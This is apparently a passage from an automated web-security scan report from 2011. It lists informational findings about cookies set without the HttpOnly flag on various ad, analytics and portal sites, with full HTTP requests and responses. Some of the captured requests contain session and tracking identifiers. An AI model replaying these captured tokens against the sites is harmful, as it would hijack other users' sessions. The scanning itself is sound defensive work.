<script language='Javascript'>var C1Rv9Pp4Tl2B={v1Wh9Kv4Ap2J:{"result": {"adv":21,"a":669018,"c":778194,"cpm":823,"js":false,"ad":"http://desk.opt.fimserve.com/bid/td/?ek=AM9BjL7hglNpFLtY1Pp-_JDyody0a
...[SNIP]...
17.107. http://fc.ef.d4.cf.bd.a1.top.mail.ru/counter  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fc.ef.d4.cf.bd.a1.top.mail.ru
Path:   /counter

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /counter?id=1963260;js=13;r=;j=true;s=1920*1200;d=16;rand=0.3155316608026624 HTTP/1.1
Host: fc.ef.d4.cf.bd.a1.top.mail.ru
Proxy-Connection: keep-alive
Referer: http://odnoklassniki.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM

Response

HTTP/1.1 200 OK
Server: wz/1.4
Date: Mon, 25 Apr 2011 14:30:07 GMT
Content-Type: image/gif
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR PSA OUR NOR"
Set-Cookie: VID=2Tir3I2W_cms; path=/; expires=Tue, 26 Jul 2011 14:30:07 GMT; domain=.mail.ru
Set-Cookie: FTID=0; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:01 GMT; domain=.mail.ru
Cache-control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 43
Connection: close

GIF89a.............!.......,...........D..;
17.108. http://goods.adnectar.com/analytics/get_avia_js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://goods.adnectar.com
Path:   /analytics/get_avia_js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /analytics/get_avia_js?api_version=3.0.0&site_key=a9aa425c93ef5dff380c&avia_version=0.8.16 HTTP/1.1
Host: goods.adnectar.com
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.2
Date: Mon, 25 Apr 2011 14:30:24 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Status: 200
ETag: "643abe138f06b030650a5c28ca19bdb4"
X-Runtime: 1
Content-Length: 6324
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: adnectar_id=PObkQ021hYBNKXjmCLweAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=adnectar.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI ADM DEV PSAi COM NAV OUR STP IND DEM"

var exceptionmessage = null;
try {
var avia_already_defined = false;
if (typeof(_an_tracker) !== 'undefined') {
avia_already_defined = true;
}

// First, define JS versions of methods not
...[SNIP]...
17.109. http://hostpapasupport.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hostpapasupport.com
Path:   /index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php?_ca=css&group=default HTTP/1.1
Host: hostpapasupport.com
Proxy-Connection: keep-alive
Referer: http://hostpapasupport.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWIFT_sessionid40=rfuntjbhsxd8ck2zcoibakug2qhndlm9

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:44:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Tue, 26 Apr 2011 19:44:00 GMT
Cache-Control: max-age=3600, must-revalidate
Set-Cookie: SWIFT_client=a%3A1%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3B%7D; expires=Tue, 24-Apr-2012 19:44:00 GMT; path=/
Content-Type: text/css
Content-Length: 14630


A:active {
   COLOR: #000000; TEXT-DECORATION: none; FONT-FAMILY: Verdana, Tahoma; FONT-SIZE: 11px;
}
A:visited {
   COLOR: #000000; TEXT-DECORATION: none; FONT-FAMILY: Verdana, Tahoma; FONT-SIZE: 11px;

...[SNIP]...
17.110. http://idcs.interclick.com/Segment.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /Segment.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=ab470e57-8d67-4a28-b9b1-aaf3331f5214 HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=719
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=c3e2564e-78bb-4fe5-b016-9ebe8e804603; tpd=e20=1305834684215&e90=1303847484419&e50=1305834684416&e100=1303847484462; sgm=8239=734250&8144=734251

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 70
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=8239=734250&8144=734251; domain=.interclick.com; expires=Sun, 25-Apr-2021 14:43:44 GMT; path=/
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 25 Apr 2011 14:43:44 GMT

GIF89a...................!..NETSCAPE2.0.....!.......,................;
17.111. http://ideco-software.ru/products/ims/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ideco-software.ru
Path:   /products/ims/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/ims/?utm_source=dir&utm_medium=cpc&utm_campaign=d1010_mail1&utm_term=mail_ics2&utm_content=10013 HTTP/1.1
Host: ideco-software.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 14:35:59 GMT
Server: Microsoft-IIS/6.0
Connection: Close
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: dv=4/25/2011 6:35:59 PM; expires=Sun, 25-Apr-2021 14:35:59 GMT; path=/
Set-Cookie: Query=/products/ims/index.html?utm_source=dir&utm_medium=cpc&utm_campaign=d1010_mail1&utm_term=mail_ics2&utm_content=10013; expires=Sun, 25-Apr-2021 14:35:59 GMT; path=/
Set-Cookie: FirstVisit=4/25/2011 6:35:59 PM; expires=Sun, 25-Apr-2021 14:35:59 GMT; path=/
Set-Cookie: ASP.NET_SessionId=fkdyl055c3sg0uuma045oy45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=windows-1251
Content-Length: 21815

<html><!-- #BeginTemplate "/Templates/main.dwt" --><!-- DW6 -->
<head>
<script type="text/javascript" src="/dropmenu/jquery.js" />
</script>
<script type="text/javascript" src="/dropmenu/hmenu.js"
...[SNIP]...
17.112. http://imagesrv.gartner.com/cio/css/main.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imagesrv.gartner.com
Path:   /cio/css/main.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cio/css/main.css;pv0bc766061b78d383 HTTP/1.1
Host: imagesrv.gartner.com
Proxy-Connection: keep-alive
Referer: http://www.gartner.com/technology/contact/contact_gartner.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WebLogicSession=cSYnN1vJnb1Nx84rkvK9h3y2Z1JSqHc4Q7GnchMG2ZDySdxm2Pns!475228577; WT_FPC=id=173.193.214.243-1722167968.30147392:lv=1303733464197:ss=1303732853510; MKTSESSIONID=2pxxN1kBM49w9XHgl67B0BKnWmRD24ZpTvjK6St3Ncw4TQzX7by2!-1018522061

Response

HTTP/1.1 200 OK
Content-type: text/css
Last-modified: Thu, 10 Feb 2011 15:31:18 GMT
ETag: "pv0bc766061b78d383b704fc4b546e71f0"
Expires: Sat, 15 Oct 2011 01:53:05 GMT
Cache-Control: public, s-maxage=7200, max-age=15724800
X-PvInfo: [S11101.C10821.A150946.RA0.G24F27.U71F6CC0A].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Mon, 25 Apr 2011 12:11:15 GMT
Age: 2975
Set-Cookie: TS83f541=0e579c5f976d24a5c926f7f3b7d6a05cfcbcedc8689d66614db564e2; Path=/
Content-Length: 7018

body form#formName3 {width: none;}
body #menubar {width: 0; padding-right: 14px;}
#tribanner { background: url(/images/tertiary_header_bkg.jpg) no-repeat; width: 990px; height:90px; }
#tribanner h
...[SNIP]...
17.113. http://imagesrv.gartner.com/js/utility_tech.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imagesrv.gartner.com
Path:   /js/utility_tech.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/utility_tech.js;pv8fee1c55d3d4ff57 HTTP/1.1
Host: imagesrv.gartner.com
Proxy-Connection: keep-alive
Referer: http://www.gartner.com/technology/contact/contact_gartner.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WebLogicSession=cSYnN1vJnb1Nx84rkvK9h3y2Z1JSqHc4Q7GnchMG2ZDySdxm2Pns!475228577; WT_FPC=id=173.193.214.243-1722167968.30147392:lv=1303733464197:ss=1303732853510; MKTSESSIONID=2pxxN1kBM49w9XHgl67B0BKnWmRD24ZpTvjK6St3Ncw4TQzX7by2!-1018522061

Response

HTTP/1.1 200 OK
Content-type: application/x-javascript
Last-modified: Thu, 12 Aug 2010 18:59:21 GMT
ETag: "pv8fee1c55d3d4ff5738b077a5af527bc3"
Expires: Sat, 15 Oct 2011 01:46:10 GMT
Cache-Control: public, s-maxage=7200, max-age=15724800
X-PvInfo: [S11101.C10821.A150946.RA0.G24F27.UF576D692].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Mon, 25 Apr 2011 12:11:15 GMT
Age: 1314
Set-Cookie: TS83f541=9116be29a30d782a8a47de6d68ae74f8d1b126f0043c06c64db564e2; Path=/
Content-Length: 2675

// JavaScript Document
// POPUP FUNCTIONS (NEED FOR OTHER FUNCTIONS TO WORK)
function rawPopUp(url, width, height, features, target) {

// main raw popup
// written by Peter Mahnke 20 May 2
...[SNIP]...
17.114. http://kronos.d1.sc.omtrdc.net/b/ss/kronos-dev/1/H.22.1/s64896461574826  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kronos.d1.sc.omtrdc.net
Path:   /b/ss/kronos-dev/1/H.22.1/s64896461574826

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/kronos-dev/1/H.22.1/s64896461574826?AQB=1&ndh=1&t=25%2F3%2F2011%208%3A33%3A57%201%20300&ns=kronos&pageName=kronos&g=http%3A%2F%2Fwww.kronos.com%2F&cc=USD&ch=kronos&events=event3&c1=kronos&c2=kronos&v2=D%3Dch&v4=D%3Dc1&v5=D%3Dc2&c7=6%3A30AM&v7=D%3Dc7&c8=Monday&v8=D%3Dc8&c9=New&v9=D%3Dc9&c10=1&v10=D%3Dc10&c11=First%20Visit&v11=D%3Dc11&v12=%2B1&v13=D%3DpageName&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1125&bh=981&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: kronos.d1.sc.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.kronos.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 13:33:47 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26DABC1D85079987-60000101000062A7[CE]; Expires=Sat, 23 Apr 2016 13:33:47 GMT; Domain=kronos.d1.sc.omtrdc.net; Path=/
Location: http://kronos.d1.sc.omtrdc.net/b/ss/kronos-dev/1/H.22.1/s64896461574826?AQB=1&pccr=true&vidn=26DABC1D85079987-60000101000062A7&&ndh=1&t=25%2F3%2F2011%208%3A33%3A57%201%20300&ns=kronos&pageName=kronos&g=http%3A%2F%2Fwww.kronos.com%2F&cc=USD&ch=kronos&events=event3&c1=kronos&c2=kronos&v2=D%3Dch&v4=D%3Dc1&v5=D%3Dc2&c7=6%3A30AM&v7=D%3Dc7&c8=Monday&v8=D%3Dc8&c9=New&v9=D%3Dc9&c10=1&v10=D%3Dc10&c11=First%20Visit&v11=D%3Dc11&v12=%2B1&v13=D%3DpageName&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1125&bh=981&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Sun, 24 Apr 2011 13:33:47 GMT
Last-Modified: Tue, 26 Apr 2011 13:33:47 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www8
Content-Length: 0
Content-Type: text/plain

17.115. http://l.azjmp.com/f.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.azjmp.com
Path:   /f.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /f.php?o=12743&e= HTTP/1.1
Host: l.azjmp.com
Proxy-Connection: keep-alive
Referer: http://www.reputationchanger.com/scheduled.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 16:06:11 GMT
Content-Type: text/html
Connection: close
Set-Cookie: OAID=025BED7B787B6DB50E0FAF2093A45A3D; Expires=Tue, 24 Apr 2012 16:06:11 GMT; Max-Age=31536000; Domain=azjmp.com; Path=/
P3P: policyref="http://azjmp.com/w3c/policy.xml", CP="ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT"
Content-Length: 39

<html><head></head><body></body></html>
17.116. http://mail.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mail.ru
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: mail.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:24:37 GMT
Server: Apache/1.3.27 (Unix) mru_xml/0.471 gorgona/2.1 mod_jk/1.2.4 mod_ruby/1.0.7 Ruby/1.6.8 mod_mrim/0.17
Connection: close
Set-Cookie: Mpopl=721425857; expires=Mon, 25 Apr 2011 14:39:37 GMT; path=/; domain=.mail.ru
Set-Cookie: mrcu=D5824DB584250497422EF3D6C1AD; expires=Thu, 22 Apr 2021 14:24:37 GMT; path=/; domain=.mail.ru
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Sun, 25 Apr 2010 14:24:37 GMT
Last-Modified: Mon, 25 Apr 2011 18:24:37 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 114440


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru" lang="ru">
<head
...[SNIP]...
17.117. http://map.media6degrees.com/orbserv/aopix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://map.media6degrees.com
Path:   /orbserv/aopix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/aopix?pixId=6387&pcv=56&cb=2534812616&topHref=http%3A%2F%2Fwww.livejournal.com%2F HTTP/1.1
Host: map.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2ljtllp0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; acs=012020h1ljtllpxzt1tzu; clid=2ljtllp01170xrd52zkwjuxh0cf4p00736010i01407; rdrlst=40315xylk60qe0000000136010znmlk346200000002360110poljyxb4000000043601; sglst=2020s0t7ljyxb4073fa00436010i01404ag3ljyxb4073fa00436010i01404; vstcnt=417k010r014uzg6118e1002

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh0e4d100837010i02408; Domain=media6degrees.com; Expires=Sat, 22-Oct-2011 14:37:38 GMT; Path=/
Set-Cookie: rdrlst=40415xylk60qe00000002370113bolk7pyq0000000137010znmlk346200000003370110poljyxb4000000053701; Domain=media6degrees.com; Expires=Sat, 22-Oct-2011 14:37:38 GMT; Path=/
Set-Cookie: sglst=2020s0t7ljyxb408snm00537010i02405ag3ljyxb408snm00537010i02405; Domain=media6degrees.com; Expires=Sat, 22-Oct-2011 14:37:38 GMT; Path=/
Set-Cookie: vstcnt=417k010r014uzg6118e1002; Domain=media6degrees.com; Expires=Sat, 22-Oct-2011 14:37:38 GMT; Path=/
Location: http://ad.afy11.net/ad?mode=7&publisher_dsp_id=5&external_user_id=xrd52zkwjuxh&custom_mon=0
Content-Length: 0
Date: Mon, 25 Apr 2011 14:37:38 GMT

17.118. http://mc.yandex.ru/watch/57617  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mc.yandex.ru
Path:   /watch/57617

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /watch/57617?rn=540876&cnt-class=1&page-ref=&page-url=http%3A%2F%2Fwebalta.ru%2F&browser-info=j:1:s:1920x1200x16:f:10.2.154:w:1125x981:z:-300:i:20110425092015:l:4.0.60129.0:en:utf-8:v:911:c:1:t:%D0%9F%D0%BE%D0%B8%D1%81%D0%BA%D0%BE%D0%B2%D0%B0%D1%8F%20%D1%81%D0%B8%D1%81%D1%82%D0%B5%D0%BC%D0%B0%20Webalta&site-info=%7B%7D&wmode=3 HTTP/1.1
Host: mc.yandex.ru
Proxy-Connection: keep-alive
Referer: http://webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 14:20:05 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:20:05 GMT
Expires: Mon, 25 Apr 2011 14:20:05 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Location: http://mc.yandex.ru/watch/57617/1?rn=540876&cnt-class=1&page-ref=&page-url=http%3A%2F%2Fwebalta.ru%2F&browser-info=j:1:s:1920x1200x16:f:10.2.154:w:1125x981:z:-300:i:20110425092015:l:4.0.60129.0:en:utf-8:v:911:c:1:t:%D0%9F%D0%BE%D0%B8%D1%81%D0%BA%D0%BE%D0%B2%D0%B0%D1%8F%20%D1%81%D0%B8%D1%81%D1%82%D0%B5%D0%BC%D0%B0%20Webalta&site-info=%7B%7D&wmode=3
Set-Cookie: yandexuid=1458985311303741205; domain=.yandex.ru; path=/; expires=Thu, 22-Apr-2021 14:20:05 GMT
Set-Cookie: yabs-sid=377248491303741205; path=/
Content-Length: 0

17.119. http://pda.loveplanet.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pda.loveplanet.ru
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: pda.loveplanet.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:51:44 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: domhit=1; path=/; expires=Mon, 02-May-2011 14:51:44 GMT; domain=.pda.loveplanet.ru
Set-Cookie: affiliate_reff=http%3A%2F%2Fmy.webalta.ru%2F; path=/; expires=Tue, 24-Apr-2012 14:51:44 GMT; domain=.pda.loveplanet.ru
Set-Cookie: randomhit=1698142961; path=/; expires=Tue, 24-Apr-2012 14:51:44 GMT; domain=.pda.loveplanet.ru
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 25 Apr 2011 14:51:44 GMT
Content-Length: 11125

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<title>.................... LovePlanet.ru. .......... .............. .. .........
...[SNIP]...
17.120. http://pixel.fetchback.com/serve/fb/pdc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/pdc?cat=&name=landing&sid=719 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/page_not_found.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1303742441_10164:0_10638:0_10640:0_10641:0_1437:0_1660:562769; uid=1_1303742441_1303179323923:6792170478871670; kwd=1_1303742441_11317:0_11717:0_11718:0_11719:0; sit=1_1303742441_719:0:0_2451:50869:45769_3236:208832:208714_782:563118:562769; cre=1_1303742441; bpd=1_1303742441; apd=1_1303742441; scg=1_1303742441; ppd=1_1303742441; afl=1_1303742441

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:41:11 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1303742471_10164:0_10638:0_10640:0_10641:0_1437:0_1660:562799; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: uid=1_1303742471_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: kwd=1_1303742471_11317:0_11717:0_11718:0_11719:0; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: sit=1_1303742471_719:30:0_2451:50899:45799_3236:208862:208744_782:563148:562799; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: cre=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: bpd=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: apd=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: scg=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: ppd=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: afl=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 25 Apr 2011 14:41:11 GMT
Pragma: no-cache
